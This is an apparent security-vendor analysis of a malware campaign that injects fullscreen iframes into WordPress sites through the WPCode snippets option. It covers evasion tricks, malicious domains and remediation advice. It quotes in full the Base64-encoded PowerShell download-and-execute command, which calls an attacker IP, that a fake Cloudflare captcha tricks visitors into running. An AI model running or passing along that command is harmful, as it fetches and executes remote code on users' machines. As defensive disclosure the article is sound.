Malicious JavaScript Injects Fullscreen Iframe on WordPress Sites

  • September 18, 2025

Discover how malicious JavaScript injects fullscreen iframes on WordPress sites, posing security risks. Learn indicators, analysis, and protection strategies.

Malicious JavaScript Injects Fullscreen Iframe on WordPress Sites: A Security Analysis

In recent security investigations, a persistent JavaScript-based malware campaign targeting WordPress websites has come to light. This malicious script injects a fullscreen iframe that silently loads and forces users to interact with unsolicited content from suspicious external domains. Such attacks often serve objectives like ad fraud, fraudulent traffic generation, or social engineering scams.

Understanding the Threat: What Was Found?

The core malicious behavior involves aggressively embedding a fullscreen iframe sourced from dubious domains. This iframe appears without consent, fully overlaying the webpage, thereby limiting any legitimate user interaction.

Key characteristics of the malware include:

  • Use of advanced evasion tactics such as anti-debugging routines that stall analysis if debugging tools are detected.
  • Hijacking of browser functions like console methods to suppress logs and hinder detection.
  • Persistent payload execution achieved via abuse of localStorage to control iframe display frequency.
  • Selective targeting based on user-agent strings, focusing primarily on Windows users with popular browsers like Chrome, Firefox, Edge, and Opera.

Indicators of Compromise in WordPress

The malware was identified embedded within the WordPress database, specifically in the wp_options table under the option_name=wpcode_snippets entry. This location is significant because it corresponds to the WPCode plugin, commonly used to execute custom code snippets safely without altering theme files.

Unfortunately, attackers exploit this plugin’s capability to execute arbitrary code, surreptitiously injecting harmful scripts through the WordPress admin interface.

Malicious Domains Involved

The iframe loads content from the following suspicious domains, which have been flagged and blocklisted by multiple security vendors:

  • capcloud.icu — widely reported for hosting deceptive content such as fake captchas.
  • wallpaper-engine.pro — associated with malware delivery and fraudulent activity.
  • Additional domains linked to the same hosting IP include: wanderclean.com, ampunshifu.org, cdnstat.net, adoodlz.com, secretdinosaurcult.com, and weathersnoop.com.

These domains were confirmed through analysis tools like Sucuri SiteCheck and VirusTotal, which reported multiple detections for each.

In-Depth Malware Analysis

Anti-Debugging and Obfuscation Techniques

The malicious script initializes with a self-executing function applying various anti-debugging techniques such as infinite loops and misuse of JavaScript constructor functions. These tactics are designed to thwart reverse engineering by freezing execution when debugging tools are active.

Additionally, the script redefines native logging methods in the browser’s console (e.g., console.log, console.warn) to nullify outputs, effectively concealing suspicious activity during inspection.

User-Agent Filtering for Targeted Attacks

The payload performs checks on the visitor’s user-agent to selectively deploy the iframe on Windows devices using mainstream browsers. This precision increases the success rate of the attack and reduces detection by avoiding irrelevant platforms and bots.

Controlled Fullscreen Iframe Injection

The iframe injection mechanism incorporates view count caps via localStorage. The malicious iframe appears up to three times and automatically disappears after approximately four minutes, simulating a benign user experience while tricking visitors into believing a legitimate action (like a download) occurred.

Fake Cloudflare Verification and PowerShell Payload

One of the most deceptive elements is a counterfeit Cloudflare “Verify you are human” page served from capcloud.icu/captcha.html. This spoofed page mimics Cloudflare’s legitimate DDoS protection but instead prompts users to execute a disguised PowerShell command on their computers.

The provided command employs Base64 encoding to download and execute a malicious script silently, leading to remote payload delivery and possible system compromise:

cmd.exe /c "start /min powershell -nop -ep Bypass -eC aQB3AHIAIAAiAGgAdAB0AHAAOgAvAC8AMQA4ADAALgAxADcAOAAuADEAOAA5AC4ANwAvAG0AeQBjAGEAcAB0AGMAaABhAC4AaAB0AG0AbAAiACAAfAAgAGkAZQB4AA=="

Decoded, the command downloads a file from http://180.178.189.7/mycaptcha.html, which may contain further malicious scripts or instructions.

Impact and Risks

This fullscreen iframe malware campaign carries several significant risks:

  • Visitor Experience Impact: The intrusive iframe disrupts legitimate interaction, damaging user trust and website reputation.
  • Security Threats: It tricks users into running harmful PowerShell commands, potentially leading to full system compromise.
  • Reputation and SEO Damage: Affected websites risk being blocklisted by security services, harming search engine rankings and user traffic.

Best Practices for Protection and Remediation

Site owners should adopt rigorous security practices to defend against and recover from infections like this:

  1. Keep WordPress Core, Plugins, and Themes Updated: Regularly applying updates closes vulnerabilities commonly exploited by attackers.
  2. Audit and Harden Plugin Usage: Disable or remove plugins that allow arbitrary code execution, especially those enabling admin-level code injection like WPCode snippets.
  3. Employ Web Application Firewalls (WAFs): WAFs can detect and block malicious JavaScript injections and unauthorized database manipulations.
  4. Enable File and Database Integrity Monitoring: Activate automatic alerts for any unauthorized changes to critical files or database entries.
  5. Implement Strong Access Controls: Enforce complex passwords, limit admin users, and disable file editing within the WordPress dashboard.
  6. Regular Malware Scanning: Use reputable malware scanners to detect infections early.

Conclusion

This malware campaign exemplifies how attackers exploit legitimate WordPress plugins and storage mechanisms to execute advanced JavaScript-based attacks. By injecting fullscreen iframes from malicious domains and tricking visitors with fake verification pages, this threat jeopardizes both website security and user safety.

Adhering to best security practices and leveraging robust monitoring tools remain essential for WordPress site owners aiming to mitigate these risks effectively.

References